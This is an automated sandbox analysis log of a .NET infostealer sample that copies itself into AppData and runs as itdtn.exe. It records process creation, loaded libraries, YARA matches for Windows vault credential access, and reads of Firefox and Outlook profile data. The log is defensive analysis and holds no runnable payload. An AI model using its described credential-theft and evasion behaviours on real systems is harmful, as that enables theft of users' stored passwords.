                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_030F3E802_2_030F3E80
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_030F41C82_2_030F41C8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDA1782_2_06FDA178
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE66002_2_06FE6600
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE55B02_2_06FE55B0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FEB2502_2_06FEB250
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE23882_2_06FE2388
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FEC1902_2_06FEC190
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE7D902_2_06FE7D90
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE76B02_2_06FE76B0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FEE3B02_2_06FEE3B0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE00402_2_06FE0040
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE5D082_2_06FE5D08
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE00072_2_06FE0007
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F6B1A74_2_02F6B1A7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F6C5C44_2_02F6C5C4
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F68AF04_2_02F68AF0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F66C6C4_2_02F66C6C
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F650C84_2_02F650C8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F650B84_2_02F650B8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F626BA4_2_02F626BA
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F68ADF4_2_02F68ADF
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F688384_2_02F68838
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F6880F4_2_02F6880F
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F65ED74_2_02F65ED7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B018474_2_05B01847
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B02E584_2_05B02E58
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B01B774_2_05B01B77
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B26E584_2_05B26E58
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B27B314_2_05B27B31
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B263384_2_05B26338
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B26E484_2_05B26E48
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B200064_2_05B20006
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B280774_2_05B28077
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B2705C4_2_05B2705C
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B200404_2_05B20040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B263284_2_05B26328
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B21AA04_2_05B21AA0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B21A904_2_05B21A90
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D1E7804_2_05D1E780
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D11BF84_2_05D11BF8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D2F1084_2_05D2F108
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D200404_2_05D20040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D2001D4_2_05D2001D
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05E186884_2_05E18688
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05E186984_2_05E18698
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05FCC8584_2_05FCC858
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05FB00404_2_05FB0040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05FB00064_2_05FB0006
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01ACE6395_2_01ACE639
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01AC4A985_2_01AC4A98
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01ACAA225_2_01ACAA22
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01AC3E805_2_01AC3E80
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01AC41C85_2_01AC41C8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FEA1785_2_06FEA178
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF66005_2_06FF6600
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF55B05_2_06FF55B0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FFB23F5_2_06FFB23F
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF30705_2_06FF3070
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FFC1905_2_06FFC190
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF7D905_2_06FF7D90
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF76B05_2_06FF76B0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FFE3B05_2_06FFE3B0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF23785_2_06FF2378
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF00405_2_06FF0040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF5CF75_2_06FF5CF7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF00375_2_06FF0037
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF00175_2_06FF0017
                        Source: Copy#51007602.exeStatic PE information: invalid certificate
                        Source: Copy#51007602.exe, 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRamobntk.dll" vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2108786993.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRamobntk.dll" vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameea41cd90-05ce-41ae-8370-da9b61ece0fb.exe4 vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameea41cd90-05ce-41ae-8370-da9b61ece0fb.exe4 vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000002.00000002.3232483832.0000000001389000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Copy#51007602.exe
                        Source: Copy#51007602.exeBinary or memory string: OriginalFilenameDoc.exe> vs Copy#51007602.exe
                        Source: Copy#51007602.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@2/2
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile created: C:\Users\user\AppData\Roaming\itdtn.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMutant created: NULL
                        Source: Copy#51007602.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Copy#51007602.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Copy#51007602.exeVirustotal: Detection: 28%
                        Source: Copy#51007602.exeReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile read: C:\Users\user\Desktop\Copy#51007602.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Copy#51007602.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Copy#51007602.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: Copy#51007602.exeStatic file information: File size 2696656 > 1048576
                        Source: Copy#51007602.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x267400
                        Source: Copy#51007602.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Yara detected Costura Assembly Loader
                        Source: Yara matchFile source: 4.2.itdtn.exe.4cce790.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.4ca6770.15.raw.unpack, type: UNPACKEDPE
